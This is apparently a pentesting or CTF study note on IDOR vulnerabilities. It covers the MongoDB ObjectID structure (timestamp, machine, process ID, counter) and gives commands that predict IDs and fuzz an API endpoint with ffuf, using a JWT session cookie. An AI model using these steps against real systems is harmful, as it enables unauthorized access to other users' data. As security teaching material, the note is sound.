IDOR

Insecure Direct Object Reference

This vulnerability occurs when user-controlled parameter values (IDs, filenames, etc.) are used to directly access resources without proper authorization checks.

Basic IDOR Testing

• Create two test accounts

• Capture Object IDs for both accounts

• Try accessing other user's resources using their Object ID

• Confirm IDOR vulnerability exists

Prediction for Increased Severity

Once IDOR confirmed, use prediction to find more Object IDs

MongoDB Object IDs Prediction

MongoDB Object ID Structure

Length: 12 bytes (24 hexadecimal characters)

Components Breakdown

1. Timestamp (4 bytes):

   • Updates every second

2. Machine Identifier (3 bytes):

   • Remains constant for same physical/virtual machine

   • Only changes if database moves to different machine

3. Process ID (2 bytes):

   • Only changes when MongoDB process restarts

   • Stays constant during normal operation

4. Counter (3 bytes):

   • Incremental counter

   • The main variable component

Brute-forcing

1. Grab the python3 version of the mongo-objectid-predict script

2. Obtain one valid Object ID from target application

3. Run tool to generate probable Object IDs:

./mongo-objectid-predict 6884a9fd208b1dbdfab74e72 > ids

./mongo-objectid-predict 6884a9fd208b1dbdfab74e72 --backward >> ids

1. Fuzz using the wordlist:

ffuf -u http://94.237.121.185:58440/api/v1/transactions/download-transactions -w ids -d '{"_id":"FUZZ"}' -H "Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjY4ODRjN2Y2MjA4YjFkYmRmYWI3NGZkNCIsImlhdCI6MTc1MzUzMjQxNCwiZXhwIjoxNzUzNTM2MDE0fQ.BDIWWlZpJmauyI57nF5r-BuHhNUqqZk1oD5Pzqmn3l0" -H "Content-Type: application/json"